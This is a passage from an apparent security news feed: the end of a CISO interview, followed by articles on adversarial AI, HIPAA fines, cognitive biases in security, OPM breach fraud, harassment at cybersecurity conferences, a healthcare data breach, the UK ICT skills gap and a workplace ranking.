As the aforementioned data stream continues to grow, applications for this technology could exist that have not yet been explored.  Any field of technology where the final product grows through organic accretion could leverage blockchain for its security interests.  Despite the unquestionable promise of blockchaining as a basis for multiparty trust, the overall value in any particular application is limited by the systemic risk. Even when the blockchain itself works perfectly, the underlying value is – or should be – capped by the end-to-end strength.

 

At RSA 2018, Facebook, Microsoft and 32 other technology and cybersecurity organisations formed a cyber consortium with the objective to work together and increase cybersecurity awareness. How beneficial do you see this move and should it be open for others to join?

I would welcome any initiative which increases cybersecurity awareness. Despite growing investments in defensive technologies, cyber breaches continue to proliferate. The threat landscape becomes even more complex as perimeters effectively evaporate thanks to ever-increasing systems (e.g., cloud, mobile) over which an enterprise has limited, if any, control.

The one thing I think enterprises must do in order to improve their cybersecurity posture is become increasingly aware of who is accessing their data, and invest in systems such as risk-adaptive protection that spot unusual activities on the network. This way you can prevent the wrong people from accessing and exploiting your personal information.

Looking at today’s security landscape, it’s clear: The time has come for vendors and security professionals to shift paradigms – from an “outside-in,” technology-led approach to an “inside-out,” people focused approach, which is better suited to the new era of mobility and cloud. It really comes down to businesses understanding the rhythm of the people as they interact with the associated flow of their data.

 

Security should be a top priority for any business. How true is this statement and do you believe organisations treat it as such?

Cybersecurity is a global, high profile challenge and I do believe that it is a top priority, and being treated as such. The perception of security has changed: it’s no longer a box-ticking compliance exercise, but is now fundamental to the successful running of a business. The risks are so high. This has changed both the landscape and the perception of the security industry, for example opening up the career ladder for security professionals in a range of roles.

 

To give people insight, what are the most rewarding and challenging aspects of the CISO position and how do you think it has evolved over the past couple of years?

 I think ‘bring your own device’ BYOD and SaaS have combined to really destroy any notions we’ve had about the boundaries of our data jurisdiction.  Facing that reality was not easy at first.  Tackling that problem head-on has been an adventure. Traditional network tools aren’t enough, and even solutions such as DLP and CASB don’t work well unless they can talk to each other.  I’m currently overseeing a revolution of sorts in my shop where we are tying UEBA analytics to DLP (and later CASB) that will transform how we address this dissolution of jurisdiction.

 

If you have one gripe about the cybersecurity industry what is it and how would you address it?

We have been threat-centric and network-centric, and in fact we believe we need to be human-centric. Our Chief Scientist offers an interesting analogy: it’s as if the industry has built security systems like a six-fingered glove, and then required that the user grow another finger to fit. Rather, we should be designing security systems that work around the person.

We can become responsible custodians and stewards of our data: both as individuals and as cybersecurity professionals. The last two years have seen the steady erosion of the clean line between the personal and public sphere – even ISPs have the legal right to sell customer data. Furthermore, continued geopolitical uncertainty, and threats both foreign and domestic, have continued to highlight the perceived tension between individual rights and security for all.

Back in November we made a prediction based upon what we saw as the perfect storm between the following four drivers: legal, technological, societal and political. We said the confluence of these factors will cause a tectonic shift in the privacy landscape: and it has.

Finally, GDPR came into force on Friday 25th May. While some companies will see the new regulation as something of a headache as they work to get their data management procedures in order, the threat of serious sanctions for those failing to comply gives a new perspective on the importance of data security. Those who want to see the bright side of this situation will view the upcoming regulation as a chance to get their data in order.

If you don’t have a gripe, what positive things in the cybersecurity industry have you seen over the past 12 months that has given you optimism for the future?

The recent privacy debate has sharpened everyone’s focus. We are going to see a closer focus on how much data is gathered and where and how long it is stored for. Data breaches or loss of intellectual property cause financial and reputational impact (damaging trust still further) and can result in litigation or even product withdrawal. This is a topic businesses are now taking much more seriously.

The good news is that security and privacy don’t have to be at odds with each other. Protection of companies as well as its employees, vendors and partners, can be performed without violation of privacy if a risk-adaptive view of security is kept in mind.  Protecting data means protecting ALL data – both personal and corporate.  Risk-adaptive means the rapid ability to uncover when a user’s credentials have been compromised, a situation that has negative impact for both the employer and the employee.

In your opinion, how should the effectiveness of a cybersecurity program be measured?

Any measurement that does not speak in terms of the enterprise’s outcomes lacks value.  I say ‘enterprise’ instead of ‘business’ because a government agency, for example, should also measure the efficacy of its cyber program in terms of how cyber positively impacts the agency’s core mission, without hampering its ability to fulfil that mission.  Did you protect the critical data of the enterprise?  Did you stop the bad thing from happening while freeing the good things to happen?  Did you minimise both the count and duration of breaches and incidents?  Did you do all this without saying “No!” to your stakeholders?  These should be the goals of a good program.

 

 

The post CISO Chat – Allan Alford, CISO at Forcepoint appeared first on IT SECURITY GURU.

Humans vs. Machines: Will Adversarial AI Become the Better Hacker?

Humans versus machines: Who’s the better hacker? The advent of artificial intelligence (AI) brought with it a new set of attacks using adversarial AI, and this influx suggests the answer is likely machine.

With each innovation in technology comes the reality that attackers who study the security tools will find ways to exploit it. AI can make a phone number look like it’s coming from your home area code — and trick your firewall like a machine learning Trojan horse.

How can organizations fight an unknown enemy that’s not even human?

Humans vs. Machines: The Problem for Security

When cybersecurity company ZeroFOX asked if humans or machines were better hackers back in 2016, they took to Twitter with an automated E2E spear phishing attack. The results? According to their experiment, machines are much more effective at getting humans to click on malicious links.

AI models are built with a type of machine learning called deep neural networks (DNNs), which are similar to neurons in the human brain. DNNs make the machine capable of mimicking human behaviors like decision-making, reasoning and problem-solving.

When researchers and developers make an image, they are trying to picture an object, such as a cup, stop sign or cat. They can generate data that attempts to mimic real data by using machine learning — and each model brings that image closer to the real object. Now, imagine those pictures for medical imaging: The power of AI offers massive benefits when it comes to analyzing images.

So, what’s the problem for security? “Adversarial examples are (say, images) which have deliberately been modified to produce a desired response by a DNN,” according to IBM Research – Ireland.

The differences between the real and the fabricated are too small for the human eye to catch. Trained DNNs might catch those differences and classify the image as something all-together different — which is exactly what the attacker wants.

An Adversarial AI Arms Race

As the amount of data increases, nefarious actors will become more efficient at deploying new types of attacks by leveraging adversarial AI. This tactic will make attack attribution even more challenging.

“Adversaries will increase their use of machine learning to create attacks, experiment with combinations of machine learning and AI and expand their efforts to discover and disrupt the machine learning models used by defenders,” according to a 2018 cybercrime report. Enterprises must essentially prepare for an adversarial arms race.

Attacks will also become more affordable, according to the report — an additional bonus for attackers. An attacker can use an AI system to perform functions that would be virtually impossible for humans given the brain power and technical expertise required to achieve at scale.

Rage Against the Machine

What’s different about adversarial AI attacks? They can put on the same malicious offenses with great speed and depth. While AI is not a fully accessible tool for cybercriminals just yet, it’s weaponization is quickly growing more widespread. These threats can multiply the variations of the attack, vector or payload and increase the volume of the attacks. But outside of speed and scale, the attacks are fundamentally quite similar to current threat tactics.

So, how can organizations defend themselves? IBM recently released the Adversarial Robustness Toolbox to help defend DNNs against weaponized AI attacks, allowing researchers and developers to measure the robustness of their DNN models. This, in turn, will improve AI systems.

Sharing intelligence information with the cybersecurity community is also important in building strong defenses. The solution to adversarial AI will come from a combination of technology and policy, but all hands must be on deck. The risks threaten all sectors across public and private institutions. Coordinated efforts among key stakeholders will help to build a more secure future.

After all, the union of man and machine has the power to give defenders a leg up.

Visit the Adversarial Robustness Toolbox and contribute to IBM’s ongoing research into Adversarial AI Attacks

The post Humans vs. Machines: Will Adversarial AI Become the Better Hacker? appeared first on Security Intelligence.

Cancer Center Fined $4.3M for HIPAA Violations Involving Data Breaches

A cancer center received an order to pay $4.3 million in a settlement for HIPAA violations that involved multiple data breaches. On 18 June, the United States Department of Health and Human Services (HHS) announced in a press release that one of its Administrative Law Judges (ALJs) ruled in favor of its Office for Civil Rights […]… Read More

The post Cancer Center Fined $4.3M for HIPAA Violations Involving Data Breaches appeared first on The State of Security.

How to Overcome Cognitive Biases That Threaten Data Security

Did you know the software that powers our brains contains security flaws that need to be patched? I’m talking about cognitive biases, which are the wetware vulnerabilities that collectively constitute the single greatest threat to enterprise data security.

The Interaction Design Foundation defines cognitive bias as “an umbrella term that refers to the systematic ways in which the context and framing of information influence individuals’ judgment and decision-making.”

In other words? A cognitive bias is simply a logical error in thinking that’s as human as the enjoyment of cupcakes and rainbows. Yes, people are irrational, but irrationality is a generality. Cognitive biases, on the other hand, are specific and defined.

Cognitive Biases Put Data Security at Risk

Don’t confuse cognitive biases (which describe thought processes) with logical fallacies (which describe flaws in arguments during communication). The former is about thoughts, and the latter is about words. This is significant because cognitive bias is one of the biggest reasons why enterprise data can be made insecure. In fact, these logical errors are a significant reason why 27 percent of employees fail social engineering tests.

Social engineering is nothing more than a systematic exploitation of human cognitive biases. Successful phishing attackers, for example, know how to use cognitive biases to convince recipients to voluntarily open links that they wouldn’t click if their actions were based on perfect logic.

Here’s another example of how cognitive biases can compromise security: Let’s say a member of an organization’s computer security incident response team (CSIRT) is confronted with a new breach. Considering a list of possible causes, someone with an anchoring bias might fixate on the first possibility considered instead of the most likely one. Another person with the availability heuristic cognitive bias might consider only potential sources that happen to come to mind — rather than taking a systematic approach that considers all possibilities. Another person suffering from the Dunning-Kruger effect, a cognitive bias that causes a subject to overestimate his or her abilities, might choose to investigate and solve the issue alone rather than bringing in colleagues, consultants or specialists.

In each of these cases, the responder fails to approach the problem systematically and with reason. Instead, he or she allows cognitive biases to muddle the process — creating unnecessary cost, consuming too much time and introducing potential risk.

Given the rapidly increasing volume and frequency of cyberthreats, it’s more important than ever to address cognitive bias head-on. Investing in the right incident response platform (IRP) can go a long way toward eliminating cognitive bias-driven decision-making.

Logical Flaws Lead to Security Lapses

I’ve learned to watch out for attentional bias as a writer, which is where perception can be affected by one’s reoccurring thoughts. This bias, for example, can potentially become a security risk when it comes to writing and interpreting technical documentation related to software or hardware features.

Creators of documentation must first become extremely familiar with the issues, technologies, processes and methods they’re documenting. Because these factors are top of mind, descriptions might gloss over or omit contextual cues for readers who have a different set of ideas in mind or are less familiar with the issues at hand. In other words: What seems obvious to the writer might be a source of confusion for the reader — with neither party able to relate to the other’s point of view.

The 2018 RSA Survey of 155 IT professionals at the RSA Conference in May found that 26 percent of companies ignore security bugs because they believe they don’t have time to fix them. The problem, however, is dealing with the consequences of unfixed bugs tends to take longer than it would’ve taken to implement the initial fix in the first place.

This could be the result of a cognitive bias called hyperbolic discounting, where choices that benefit the present self are given priority over those that benefit the future self. In this context, the benefits of ignoring a bug now are given more weight than the cost of dealing with the problem later.

The survey also revealed that IT professionals deliberately ignore security holes for other reasons, including a lack of knowledge about how to proceed. This choice could be driven by the ambiguity effect cognitive bias, where a lack of information informs a decision. Because the path to troubleshooting a problem is unclear, that path is rejected.

Finally, less than half of the organizations surveyed said they patch vulnerabilities as soon as they’re known. Eight percent of respondents even reported that they apply patches just once or twice per year. This is good, old-fashioned procrastination — which, of course, is also a cognitive bias.

Understanding Biases to Reduce Human Error

Awareness about specific cognitive biases must be a core part of every security training exercise. The first step toward overcoming cognitive biases is for everyone to understand that they exist, they’re pervasive and they have a negative impact on data security. Cognitive biases are also the reason for best practices, which embody institutional learning and lessons that reduce reliance on individual thought processes.

Most importantly, security professionals must overcome the biases that enable biases. At many organizations, security specialists fail to understand the perspective of less technical users. This lack of understanding is a cognitive bias called the curse of knowledge, and it can result in false assumptions and poor communication.

But the mother of all cognitive biases is that only other people have cognitive biases. This belief is called the bias blind spot. The truth is that cognitive biases are just part of being human. I have them, you have them — and nobody is immune.

It’s important for security leaders to base their decision-making on this inescapable fact and frequently patch the wetware bug that constitutes the biggest threat to your organization’s security.

The post How to Overcome Cognitive Biases That Threaten Data Security appeared first on Security Intelligence.

Fraudster caught using OPM hack data from 2015

Way back in 2015, the US Office of Personnel Management (OPM) was electronically burgled, with hackers making off with 21.5 million records. That data included social security numbers, fingerprints, usernames, passwords and data from interviews conducted for background checks. Now, a woman from Maryland has admitted to using data from that breach to secure fraudulent loans through a credit union.

Via: Reuters

Source: Department of Justice

Can #MeToo Change the Toxic Culture of Sexism and Harassment at Cybersecurity Conferences?

Camille Tuutti can’t remember all the times she’s been harassed. A prominent information technology journalist and editor, Tuutti feels that her friendly and outgoing personality — a necessity in her line of work — has often been misinterpreted by men in her field as an invitation for inappropriate behavior, especially at top cybersecurity conferences, where binge drinking is encouraged. Drunk men have often put their arms around her and her colleagues. She has been asked out “a million times.” Someone tried to kiss her the first time she met him.

This April, at RSA, a leading cybersecurity conference held in San Francisco, she was walking the showroom with a male colleague when a male stranger asked her what she was wearing to bed. She noticed, too, that vendors at the show assumed that she didn’t know what she was talking about and that her colleague did. And despite organizers’ previous attempts to implement a dress code, many of the booths featured “booth babes” — scantily clad models hired to attract men to vendors’ wares. “It was so tone-deaf, especially in 2018 and especially in the wake of #MeToo,” Tuutti said.

The casual sexism Tuutti encountered at RSA is not atypical of big-league hacker and cybersecurity conferences. While there are no precise statistics available about harassment at these events, anecdotal reports like Tuutti’s have been widespread and documented for years.

The Intercept spoke to nearly two dozen women across the industry who recounted experiences ranging from uncomfortable to traumatic at conferences such as Def Con and Black Hat, held each year in Las Vegas, and RSA, held worldwide. The women who spoke to The Intercept had encountered a variety of offenses, from suggestive commentary and drunken come-ons to groping and assault. Some of the women, among whom are renowned journalists, CEOs, diversity advocates, and hackers, said that even if their own status had shielded them from some of the worst behavior, they had all heard troubling stories from younger colleagues, peers, and friends.

The women who spoke to The Intercept had encountered a variety of offenses, from suggestive commentary and drunken come-ons to groping and assault.

Troubling new stories surface every conference season, said Kasha Gauthier, director in residence for Community Engagement at the Advanced Cyber Security Center, and yet little seems to change. Gauthier and others see the harassment at conferences as part of a systemic problem in the field of cybersecurity. “To me, it’s just even more of what I see in a boardroom,” she said.

“I know many women who have attended Def Con and have experienced some form of harassment,” said Chenxi Wang, a leading expert in cybersecurity. “A lot of women will tell you, ‘I just brush it off and do my own thing.’ That’s fine. But the question is, should we put young women through that? Should we tell them, ‘Oh just toughen up, this is the industry?’”

Even within the field of technology, which is known for its gender bias, cybersecurity remains a particularly striking example. At companies like Google and Facebook, women make up about 30 percent of employees — and there are notably fewer of them the higher up the ranks one goes. Cybersecurity is much worse. According to the widely cited Global Information Security Workforce study, women compose around 11 percent of the industry and, at every level, earn less than their male peers. More than half of women working in cybersecurity have reported discrimination.

The major cybersecurity conferences are more than just massive parties and prankish sideshows. The events are crucial for networking, talking to recruiters, and learning new skills. Sometimes conference presentations become news events themselves. In 2015, hackers at Def Con demonstrated that they could remotely take control of a Chrysler Jeep’s transmissions, leading the company to recall 1.4 million vehicles. Last year, the conference’s report from its Voting Machine Hacking Village sparked a national dialogue on the security vulnerabilities of electronic voting.

As the leading gatherings for key speakers and cutting-edge products, conferences set the tone for what the field can and should look like. All-male lineups of keynote speakers — which have recently been termed “manels,” rather than panels, on social media — are still a frequent occurrence, as they were this year at the RSA Conference. And even as event organizers claim that they are taking steps to address sexism and harassment, many women still perceive a general indifference to their complaints, which they say sends a message about what kind of behavior is considered appropriate.

“When it comes to conference season in Vegas, there’s all of this folklore about getting hurt and that people shouldn’t come,” said Jessy Irwin, head of security at Tendermint, a blockchain tech company. Irwin said she always goes to conferences with a pack of women and makes a point of ensuring that those who are new to the industry aren’t traveling alone.

In the months since #MeToo took off, women’s whispers about sexual harassment and abuse have been transformed into vocal demands for systemic change — in some cases, with material consequences. Not long before #MeToo began, so-called cybersecurity rock stars Jacob Appelbaum, a former developer at the Tor Project and WikiLeaks collaborator, and Morgan Marquis-Boire, a cybersecurity expert, were asked to resign from leadership positions following multiple allegations of sexual misconduct and rape. (Appelbaum has denied the allegations against him. Marquis-Boire admitted to rape and assault of multiple women in private messages with an acquaintance. Marquis-Boire was the director of security for First Look Media, The Intercept’s parent company, and sometimes a contributor at The Intercept. He left the company for unrelated reasons before the allegations against him came to light.)

Some women are hopeful that the growing legitimation of women’s experiences may pressure conference organizers to take more pointed and effective steps to address abusive behavior at their events. “I think people are more vocal after #MeToo and feel more inclined to speak up and speak out if they or somebody they know are experiencing harassment,” Wang noted.

Others, however, are more skeptical about the possibility of a culture change. “There’s been no reckoning that I’ve seen,” said Gauthier. “I think there should be, and I think women are having those discussions, but that’s not where money is and not where power is.” Some women told The Intercept that they are not willing to risk yet another season of harassment to find out whether anything feels safer. As women seem to be attending these events in decreasing numbers, there is one matter in which they are all in agreement: Change is impossible so long as the men in charge don’t step up to address the issue head-on.

Las Vegas, Nevada, July 28, 2017. Hackers examine a voting machines during DEF CON a gathering of info security professionals.

Hackers examine a voting machine during Def Con, a gathering of information security professionals, in Las Vegas on July 28, 2017.

Photo: Mark Ovaska/Redux

Def Con, the world’s largest and most famous hacker conference, started in 1993 as a goodbye party for a hacker network. It has since grown and professionalized, drawing crowds of close to 22,000 people to a Las Vegas hotel every August. Celebrated computer security experts mingle with NSA agents and civil liberties lawyers. Attendees register by paying $250 in cash at the door. There are around nine men for every woman in attendance. Other conferences, such as RSA and Black Hat, have a more corporate vibe, charging registration fees over $2,000.

Women describe an overall conference culture that promotes a “what happens in Vegas stays in Vegas” mentality, with after-parties where attendees are encouraged to drink as much as possible. They explained that there are often few networking alternatives to the alcohol-heavy after-parties.

Take Def Con’s Hacker Jeopardy in 2016. The late-night game went viral on Twitter after a cybersecurity expert posted about a request that contestants guess the size of a porn star’s penis to within half an inch. Women dressed in skimpy clothing served beers to an all-male group of contestants. In the Double Jeopardy round, they removed pieces of clothing each time a contestant got a question right. The next day, after conference organizers heard about online pushback, they changed the rules so that contestants who answered correctly could have the choice between sending a donation to the Electronic Frontier Foundation or continuing to call for a woman to undress. Progress, in other words, has felt incremental.

At Hacker Jeopardy, contestants who answered correctly could have the choice between sending a donation to the Electronic Frontier Foundation or continuing to call for a woman to undress.

Founders of these four conferences include both black-hat hackers, who work outside the industry, and sometimes outside the law, to expose flaws on their own, and white-hat hackers, who work within governments and corporations. Over the years, when faced with complaints, some organizers have responded by describing their events as harmless fun. Jeff Moss, the founder of both Def Con and Black Hat, has defended Hacker Jeopardy by appealing to tradition and the distinction, in his eyes, between “sexy” and “sexism.”

After Gauthier, a veteran infosec worker, heard about Hacker Jeopardy, she spoke to one of the workers at the conference for over an hour. “The answer that I got was that it was anybody’s choice to attend or not to attend, and can’t I lighten up because it’s good fun?” she said. “People don’t understand that as industry evolves, this is a professional environment, and this is not inclusive behavior.”

These problems are self-reinforcing: So long as conferences celebrate and reflect the sexist status quo of cybersecurity, expanding the ranks of women in the field will be a problem. Some conferences are reported to still feature more “booth babes” than actual female attendees. One woman remembered attending a conference with so few women that when she walked into the ladies’ room, she needed to turn the lights on. Another recalled entering the bathroom and seeing only booth babes in miniskirts and go-go boots.

And yet for years, some organizers have kicked the problem down the road. Instead of organizing the conferences to reflect a positive vision of what the field could be, they’ve defended their choices to have all-male keynotes by arguing that such talks are just a reflection of the way things are. A statement that RSA organizers released about their 2018 “manel” reads: “A diverse speaking program starts with increasing diversity within the technology sector, which needs to be addressed by the industry as a whole.”

The stakes for more inclusive representation are high. Women are leaving the technology sector in greater numbers than they are entering it. Computer science is one of the fastest-growing fields in the United States, and yet, every year since 1984, the number of women in technology in the U.S. has decreased. Attrition is typical. Forty-one percent of women quit the tech industry mid-career compared with just 11 percent of men, according to the National Center for Women & Information Technology. The cybersecurity industry has been projected to have 1.8 million unfilled jobs worldwide by 2022. To address this shortage, companies will need to recruit and retain women, the Global Information Security Workforce study found.

That may be easier said than done. When conferences exclude women speakers, they send a “clear message” that women are still not welcome in the security field, wrote Access Now, a nonprofit focused on human rights, about the keynote roster for the RSA Conference USA 2018. “This is a message that will be heard not only by the attendees but by organizers of other conferences that look to RSA Conference as a source for guidance,” the letter reads. “The bigger danger is that we could see this message — and the mindset behind it — reflected in hiring, development, and operational decisions across the sector.”

Audience members at the RSA Conference at San Francisco's Moscone Center, March 1, 2016. Security experts now worry that if Apple is forced to create software to bypass its password system, it will be a precursor to many more government requests. (Jim Wilson/The New York Times)

Audience members at the RSA Conference at San Francisco’s Moscone Center, March 1, 2016.

Photo: Jim Wilson/The New York Times/Redux

The absence of women at conferences only strengthens the self-serving perception for the majority-masculine field that there is a “pipeline problem” — that the reason there is a gender deficit is because there are simply no talented women to hire. It ignores the fact that talented women have already been pushed away.

Many women say the problem begins as early as recruiting. Cybersecurity classes use masculine language — militaristic talk of enemies, penetration tests. Partly emerging from army and intelligence communities, hackers can be prone to hazing and competitive one-upmanship, according to Sarah Clarke, a security adviser. “It’s a culture of just being mean to new people and needing to ‘prove yourself,’” Clarke said.

Rebecca Long, a software engineer and diversity advocate, says that it’s not a stretch to see a connection between the goals of hacking and its particular culture of harassment. “The whole idea of hacking is compromising someone’s system and having power and control over someone else’s computer or network,” she said. Some women have recommended that the field might seem more welcoming if it moved away from the adversarial language of warfare and instead, framed its goals as a matter of safety.

Women told The Intercept that the tacit norms of the industry can make it seem as though harassment is a problem of female sensitivities, rather than male behavior. The unspoken rule is that women must learn to shrug it off and accommodate themselves to inappropriate actions.

Many women interviewed said that the accumulation of minor incidents over the years leads to their dissatisfaction with — or departure from — the field. They recalled stories of inappropriate touching, lewd remarks, and business meetings leading to sexual propositions. Nearly every woman interviewed said that, at some point, they had been mistaken for a male conference-goer’s girlfriend, even if they were one of the keynote speakers. When not being singled out for sexual attention, they were ignored, dismissed, or asked where their boss was. Like many of the women who spoke to The Intercept, infosec researcher Sarah Lewis said it was not a single experience, but the buildup of small brush-offs that drove her away from industry conferences where she wasn’t being paid to speak. “Numerous times, I’ve been asked if the food is coming out. At conferences I’ve keynoted at, I’ve been asked if I was one of the student groups there. Most of the sexism I tend to see is people who mean well, but who have an assumption that I don’t have experience and I don’t belong,” she said.

“There are a lot of cases of overt hostility,” said Amie Stepanovich, who manages cybersecurity policy at Access Now. “I think what is more insidious sometimes are the less overt cases: These are conference sessions where there are people of color or women represented, but they aren’t asked many questions. Or audience questions are only accepted from men. It’s not always overt examples that drive people away. Oftentimes, it’s little things that send the message that people aren’t welcome.”

“It’s not always overt examples that drive people away. Oftentimes, it’s little things that send the message that people aren’t welcome.”

Many women don’t have the privilege of being able to choose whether to leave their jobs if and when harassment occurs. But when it comes to voluntary conferences, it’s not surprising that after years of experiencing such incidents, women have simply stopped showing up. Many told The Intercept that there were certain conferences they would never consider attending again because of their experiences there.

Yet while not showing up may be the safest and most sensible option for one’s personal well-being, it can put women at a disadvantage professionally. As the programmer and feminist activist Valerie Aurora has written, “When you say, ‘Women shouldn’t go to DEFCON if they don’t like it,’ you are saying that women shouldn’t have all of the opportunities that come with attending DEFCON: jobs, education, networking, book contracts, speaking opportunities — or else should be willing to undergo sexual harassment and assault to get access to them.”

In 2011, on the second night of Def Con, Emily Maxima, a programmer, and her wife, who does not work in infosec, were inside the Caesars Palace Hotel waiting for a DJ set, when a Def Con security guard — typically male and known as a “goon” in conference slang — asked them how their “bribe card” was going. Bribe cards are played like bingo: Attendees perform scavenger hunt favors for the goons in exchange for prizes. “I only had one hole punched in mine,” Maxima wrote on her blog years later. The goon turned to her and said: “‘We could punch ‘boobs’ for you.’ One of these volunteer security guards had literally just solicited to see my wife’s breasts right in front of me in exchange for a hole in my bribe card.” Maxima has not returned to Def Con since.

10284002735_4eb43244a1_o-1528835625

The Grace Hopper Celebration, a long-running conference named for a pioneering programmer, on Oct. 5, 2013.

Photo: AnitaB.org/Flickr

Women working across all sectors of technology have been fighting back against the field’s entrenched gender bias. In 2014, along with a few other female cybersecurity experts, Chenxi Wang started a social media campaign to ban booth babes. One year later, RSA instituted a dress code in response. Wang said it was a small victory: “They took a step in a positive direction, so we don’t see overt sexualized displays. Even though you still see the occasional booth babes, the overall tone of the show floor has become a lot more professional.”

In response to the booth babe ban, Deidre Diamond, a veteran technologist, was inspired to start a company called Brainbabe, which tackles sexism and the skills shortage in the industry at the same time by providing vendors with students from diverse backgrounds to work at booths.

Women in tech have their own gatherings — from the Grace Hopper Celebration, a long-running conference named for a pioneering programmer that draws around 18,000 people a year, 90 percent of them women, to Our Security Advocates Conference, or OURSA, founded this April in response to RSA’s sexist lineup. In 2016, women began to organize a special event known as TiaraCon, separate from Def Con’s main show, for networking, lock-picking (a popular conference extracurricular), and resume-writing. Year-round, groups like the Diana Initiative, Future Ada, and the Ada Initiative provide support for women in tech.

Leigh Honeywell, CEO of the anti-harassment technology startup Tall Poppy, has hosted a workshop in a Caesars Palace room apart from Def Con for the last four years known as “Ally Skills,” which teaches attendees how they can work to improve diversity in security. “There are folks in the field who do want to see it become a more hospitable place for underrepresented people, and I feel fortunate to be able to share tools and tactics for making that happen,” Honeywell explained in an email. The open source workshop, which was originally created by the Ada Initiative, teaches attendees the tools to call out misogyny and bias. Slides ask attendees to brainstorm how allies might respond to situations such as: “A woman you don’t know is standing near your all-male group at a conference in your field. The conference attendees are more than 90 percent men. She is alone and looks like she would rather be talking to people.”

But some women say that separate events, while valuable, do not force the main conference organizers to directly address gender bias. In fact, some say that such events reinforce the message that harassment is a problem for women to deal with on their own. Events that are separate cannot, by their very nature, be equal, Irwin said. While she is glad to have a focus on diversity, she said, “I don’t want the ‘girls’ version.’ I want the big stuff we do for everybody to already have diversity in it.”

“What I want to see is men calling out other men.”

Several women emphasized that until conference management puts the kind of allyship promoted by Honeywell and others at the center of their programming, it will be difficult to effect change. Men need to step up too, Diamond argued: “I tell men this all the time: They’re the ones who are going to solve the problem. There are nearly 90 percent of them. What I want to see is men calling out other men.”

One of the most successful and effective initiatives undertaken to change conference culture has been the development and implementation of written policies that explicitly ban harassment. As the Ada Initiative explains, the most effective policies publicly specify what kinds of behaviors are not acceptable, establish a reporting procedure with contact information for violations, and document how the staff will respond to reports.

In the last several years, responding in part to the organizing work of feminist technologists like those at the Ada Initiative, Def Con, RSA, and Black Hat have each instituted clear codes of conduct that prohibit harassment and reserve the right to expel and banish attendees engaging in unacceptable behavior. The latter two have the most detailed of the four conferences’ policies, spelling out the nature and scope of harassment prohibited.

ARCHIV - Der US-amerikanischer Internetaktivist Jacob Appelbaum spricht am 06.05.2014 bei einer Keynote auf der Internetkonferenz Republica in Berlin. Photo by: Britta Pedersen/picture-alliance/dpa/AP Images

Internet activist Jacob Appelbaum gives a keynote address in Berlin on June 5, 2014.

Photo: Britta Pedersen/picture-alliance/dpa/AP

Last year, Def Con became the first hacker con to provide a transparency report of incidents, which it posted online this month. According to the report, at the 2017 event, there were “7 harassment events,” including two people “banned for life for harassing women.” The report also noted that Appelbaum and Marquis-Boire were banned. (Even in its transparency report, the conference kept things a little tongue-in-cheek, noting that there were also “3 adorable dog reports.”)

Experts on anti-harassment policies say that the policies are still insufficient: They do not specify channels for anonymous reporting of incidents, give a deadline for how quickly the conference will respond to reports, or explain what happens if someone in the group charged with enforcement is accused of harassment.

It is also not clear whether the code of conducts’ enforcement mechanisms prioritize the safety of those who have experienced abuse. “It’s been my personal experience that event staff are simply not equipped or qualified to be first responders on these issues,” explained Melanie Ensign, a press lead for Def Con and director of security at Uber, in an email. Outside of her official capacity at the conference, she has been working with experts in the community to expand resources available to survivors of assault.

Black Hat general manager Steve Wylie told The Intercept that the conference’s policy was developed in 2014 and continues to be a “live document.”

“Clearly our industry has some issues, and we’ve developed programs to highlight the issue,” Wylie said. The conference has been attempting to recruit and encourage more women to apply to speak; new diversity initiatives include partnerships with Queercon, a scholarship program for women, peer-to-peer mentoring, and a series of presentations that address human (rather than technical) issues.

RSA declined to respond to detailed questions for this story and sent a link to a blog post addressing this year’s controversy regarding speaker diversity. Def Con, which has not updated its code of conduct since 2015, wrote in an emailed statement: “We are committed to being proactive rather than reactive in the areas of representation and safety. This includes being available to hear all concerns, making it easy for attendees to share those concerns, and having a clearly defined, ongoing process for addressing those concerns. We’ve invested in a reorganization of our volunteer staff, new training, and the creation of an independent department for reporting incidents. … We will continue to do what hackers do — make changes, see what gets better, and iterate on the results.” For this year’s conference, the statement said, Def Con will be introducing a dedicated crisis support line that attendees could access by phone, text, or chat.

Jessy Irwin of Tendermint often feels surprise that in an industry that prides itself on finding patterns and addressing vulnerabilities, the response to decades of harassment has been slow-going. “How the hell can we claim to be good at our jobs at work when we can’t get any of the people in our communities to follow our best practices of knowledge?” she asked. “I want to see the response process get better. I don’t know how we can call ourselves experts at security if we can solve problems with code, but we can’t do it when it comes to people.”

The post Can #MeToo Change the Toxic Culture of Sexism and Harassment at Cybersecurity Conferences? appeared first on The Intercept.

CarePartners Face Data Breach Following Another Cyber Attack On Healthcare

Cyber attacks and data breaches on health care services continue this week whereby a Canadian healthcare services company CarePartners faced

CarePartners Face Data Breach Following Another Cyber Attack On Healthcare on Latest Hacking News.

Pupils Aren’t Taking ICT And The Digital Skills Gap Is Widening

A new report was released from the University of Roehampton today, which looks at how many pupils achieved GCSE and A-level computing qualifications in 2017. The report shines a light on the digital skills gap. Key stats include that just 12% of UK students choose to take ICT at GCSE, and just 20% of those who do take the subject are girls. Trish Burridge, Director of Consulting Services EMEA at Skillsoft commented below.

Trish Burridge, Director of Consulting Services EMEA at Skillsoft:

“Not only are these worrying statistics for the tech industry, but the corporate landscape as a whole.  Every industry in some way has been disrupted by technology.  Businesses want employees with the digital skills needed to meet the demands of the modern workplace.

Organisations are increasingly turning to training programmes to upskill their current employees.  If young women do not have a strong digital skills base when entering the workforce, they will undoubtedly be at a disadvantage against other candidates that do.”

The ISBuzz Post: This Post Pupils Aren’t Taking ICT And The Digital Skills Gap Is Widening appeared first on Information Security Buzz.

Panda Security Sweden: A Great Place to Work

The Great Place to Work Institution has ranked Panda Security Sweden 6th on the 2018 version of its annual list of the best workplaces in Sweden.

Great Place to Work is a global authority on workplace culture, and annually makes the world’s largest and most respected study of workplace excellence. Its rigorous, objective methodology sets the standard for defining great workplaces all around the world. Their studies provide an unparalleled insight into workplace culture, and go beyond just rankings and lists to provide practical knowledge and tools to transform workplaces.

Other companies considered “Great Places to Work” include Salesforce, EY, and Adobe.

Panda Security Sweden began the process to be included on the list of Swedish companies in December 2016. In the first half of 2017, the company worked in teams to define the areas where their work culture stands out and goes beyond simple hygiene factors such as salary and policies:

  • Recruitment, Welcoming, and Onboarding
  • Inspiration
  • Informing
  • Listening, Problem Solving, and Involving
  • Appreciation
  • Development
  • Caring, Balance, and Support
  • Celebration
  • Sharing and CSR

The Great Place to Work Institution then carried out an audit in order to assess the company in these areas. The work on providing information was led by Julia Hallström (Finance Manager), with the support of Karin Angerind (Marketing and Sales Process Manager).

